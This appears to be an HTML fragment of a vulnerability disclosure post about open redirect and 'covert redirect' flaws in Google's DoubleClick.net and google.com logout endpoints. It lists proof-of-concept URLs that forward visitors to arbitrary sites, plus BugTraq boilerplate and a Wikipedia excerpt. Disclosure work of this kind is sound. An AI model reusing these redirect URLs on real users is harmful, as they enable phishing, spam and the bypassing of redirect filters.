<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>www.inzeed.com/kaleidoscope/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>www.tetraph.com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 3:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http%3A%2F%2Fib.adnxs.<wbr></wbr>com</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com%" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http%3A%2F%2Fwww.<wbr></wbr>reuters.com%</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http://www.tetraph.<wbr></wbr>com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">...</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">We can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers.</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.3)</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=lfKHVGHWvk8&feature=youtu.be</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. Google has patched some of them. BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The below things be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the fllowing web securities have been published here, Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. It also publishes suggestions, advisories, solutions details related to Open Redirect vulnerabilities and cyber intelligence recommendations.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(3) Google DoubleClick.net Can Adversely Affect Other Websites.</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">At the same time, Google DoubleClick.net can be used to do "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" to other websites, such as Google, eBay, The New York Times, etc.(Bypass other websites' Open Redirect filters)</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.1) </b></span><b>Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Domain:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">google.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Google is an American multinational technology company specializing in Internet-related services and products. These include online advertising technologies, search, cloud computing, and software. Most of its profits are derived from AdWords, an online advertising service that places advertising near the list of search results. Google was founded by Larry Page and Sergey Brin while they were Ph.D. students at Stanford University. Together they own about 14 percent of its shares but control 56 percent of the stockholder voting power through supervoting stock. They incorporated Google as a privately held company on September 4, 1998. An initial public offering followed on August 19, 2004. Its mission statement from the outset was "to organize the world's information and make it universally accessible and useful," and its unofficial slogan was "Don't be evil". In 2004, Google moved to its new headquarters in Mountain View, California, nicknamed the Googleplex. The corporation has been estimated to run more than one million servers in data centers around the world (as of 2007). It processes over one billion search requests and about 24 petabytes of user-generated data each day (as of 2009). In December 2013, Alexa listed google.com as the most visited website in the world. Numerous Google sites in other languages figure in the top one hundred, as do several other Google-owned sites such as YouTube and Blogger. Its market dominance has led to prominent media coverage, including criticism of the company over issues such as search neutrality, copyright, censorship, and privacy." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=<wbr></wbr>writely&continue=https://<wbr></wbr>google.com/</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=wise&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fsecurity</a></span></div>
